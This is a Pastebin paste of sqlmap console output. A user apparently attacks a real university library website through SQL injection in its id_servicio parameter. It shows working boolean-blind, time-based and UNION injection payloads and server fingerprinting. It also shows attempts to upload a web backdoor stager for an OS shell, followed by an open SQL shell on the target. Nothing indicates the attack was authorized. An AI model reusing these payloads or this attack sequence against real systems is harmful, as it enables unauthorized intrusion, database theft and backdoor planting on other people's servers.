  1172. [17:43:27] [INFO] fetched data logged to text files under 'C:\Users\whitejoker52\.sqlmap\output\biblioteca.xoc.uam.mx'
  1173.  
  1174. [*] shutting down at 17:43:27
  1175.  
  1176.  
  1177. C:\Users\whitejoker52\Desktop\hacking\sqlmap>sqlmap.py -u http://biblioteca.xoc.uam.mx/servicio.html?id_servicio=19 --os-shell
  1178.          _
  1179.  ___ ___| |_____ ___ ___  {1.0.8.16#dev}
  1180. |_ -| . | |     | .'| . |
  1181. |___|_  |_|_|_|_|__,|  _|
  1182.       |_|           |_|   http://sqlmap.org
  1183.  
  1184. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  1185.  
  1186. [*] starting at 17:43:36
  1187.  
  1188. [17:43:36] [INFO] resuming back-end DBMS 'mysql'
  1189. [17:43:36] [INFO] testing connection to the target URL
  1190. sqlmap resumed the following injection point(s) from stored session:
  1191. ---
  1192. Parameter: id_servicio (GET)
  1193.     Type: boolean-based blind
  1194.     Title: AND boolean-based blind - WHERE or HAVING clause
  1195.     Payload: id_servicio=19 AND 1397=1397
  1196.  
  1197.     Type: AND/OR time-based blind
  1198.     Title: MySQL >= 5.0.12 AND time-based blind
  1199.     Payload: id_servicio=19 AND SLEEP(5)
  1200.  
  1201.     Type: UNION query
  1202.     Title: Generic UNION query (NULL) - 11 columns
  1203.     Payload: id_servicio=-2865 UNION ALL SELECT NULL,NULL,CONCAT(0x7178627a71,0x6257576d614b736a796e6d73576c69476e56504161636268436f7170584a6e7674414b7363624254,0x7170716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- PYNR
  1204. ---
  1205. [17:43:39] [INFO] the back-end DBMS is MySQL
  1206. web server operating system: Windows
  1207. web application technology: PHP 5.2.3, Apache 2.2.4
  1208. back-end DBMS: MySQL 5
  1209. [17:43:39] [INFO] going to use a web backdoor for command prompt
  1210. [17:43:39] [INFO] fingerprinting the back-end DBMS operating system
  1211. [17:43:41] [INFO] the back-end DBMS operating system is Windows
  1212. which web application language does the web server support?
  1213. [1] ASP (default)
  1214. [2] ASPX
  1215. [3] JSP
  1216. [4] PHP
  1217. >
  1218. [17:43:57] [INFO] retrieved the web server document root: 'C:\AppServ\www'
  1219. [17:43:57] [INFO] retrieved web server absolute paths: 'C:/AppServ/www/cosei/servicio.html'
  1220. [17:43:57] [INFO] trying to upload the file stager on 'C:/AppServ/www/' via LIMIT 'LINES TERMINATED BY' method
  1221. sqlmap got a 302 redirect to 'http://biblioteca.xoc.uam.mx'. Do you want to follow? [Y/n] n
  1222. [17:44:10] [WARNING] unable to upload the file stager on 'C:/AppServ/www/'
  1223. [17:44:10] [INFO] trying to upload the file stager on 'C:/AppServ/www/' via UNION method
  1224. [17:44:10] [WARNING] the injection is on a GET parameter and the file to be written hexadecimal value is 8814 bytes, this might cause errors in the file writing process
  1225. [17:44:11] [WARNING] expect junk characters inside the file as a leftover from UNION query
  1226. [17:44:13] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
  1227. [17:44:15] [INFO] trying to upload the file stager on 'C:/AppServ/www/cosei/' via LIMIT 'LINES TERMINATED BY' method
  1228. [17:44:19] [WARNING] unable to upload the file stager on 'C:/AppServ/www/cosei/'
  1229. [17:44:19] [INFO] trying to upload the file stager on 'C:/AppServ/www/cosei/' via UNION method
  1230. [17:44:19] [WARNING] the injection is on a GET parameter and the file to be written hexadecimal value is 8842 bytes, this might cause errors in the file writing process
  1231. [17:44:23] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
  1232. [17:44:25] [WARNING] HTTP error codes detected during run:
  1233. 414 (Request-URI Too Long) - 4 times
  1234. [17:44:25] [INFO] fetched data logged to text files under 'C:\Users\whitejoker52\.sqlmap\output\biblioteca.xoc.uam.mx'
  1235.  
  1236. [*] shutting down at 17:44:25
  1237.  
  1238.  
  1239. C:\Users\whitejoker52\Desktop\hacking\sqlmap>sqlmap.py -u http://biblioteca.xoc.uam.mx/servicio.html?id_servicio=19 --sql-shell
  1240.          _
  1241.  ___ ___| |_____ ___ ___  {1.0.8.16#dev}
  1242. |_ -| . | |     | .'| . |
  1243. |___|_  |_|_|_|_|__,|  _|
  1244.       |_|           |_|   http://sqlmap.org
  1245.  
  1246. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  1247.  
  1248. [*] starting at 17:44:35
  1249.  
  1250. [17:44:36] [INFO] resuming back-end DBMS 'mysql'
  1251. [17:44:36] [INFO] testing connection to the target URL
  1252. sqlmap resumed the following injection point(s) from stored session:
  1253. ---
  1254. Parameter: id_servicio (GET)
  1255.     Type: boolean-based blind
  1256.     Title: AND boolean-based blind - WHERE or HAVING clause
  1257.     Payload: id_servicio=19 AND 1397=1397
  1258.  
  1259.     Type: AND/OR time-based blind
  1260.     Title: MySQL >= 5.0.12 AND time-based blind
  1261.     Payload: id_servicio=19 AND SLEEP(5)
  1262.  
  1263.     Type: UNION query
  1264.     Title: Generic UNION query (NULL) - 11 columns
  1265.     Payload: id_servicio=-2865 UNION ALL SELECT NULL,NULL,CONCAT(0x7178627a71,0x6257576d614b736a796e6d73576c69476e56504161636268436f7170584a6e7674414b7363624254,0x7170716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- PYNR
  1266. ---
  1267. [17:44:38] [INFO] the back-end DBMS is MySQL
  1268. web server operating system: Windows
  1269. web application technology: PHP 5.2.3, Apache 2.2.4
  1270. back-end DBMS: MySQL 5
  1271. [17:44:38] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
  1272. sql-shell> help
  1273. [17:44:44] [INFO] fetching SQL query output: 'help'
  1274. [17:44:46] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
  1275. [17:44:46] [INFO] retrieved:
  1276. [17:44:58] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
  1277. sql-shell>
  1278. sql-shell>
RAW Paste Data
Pastebin PRO Summer Special!
Get 60% OFF on Pastebin PRO accounts!
Top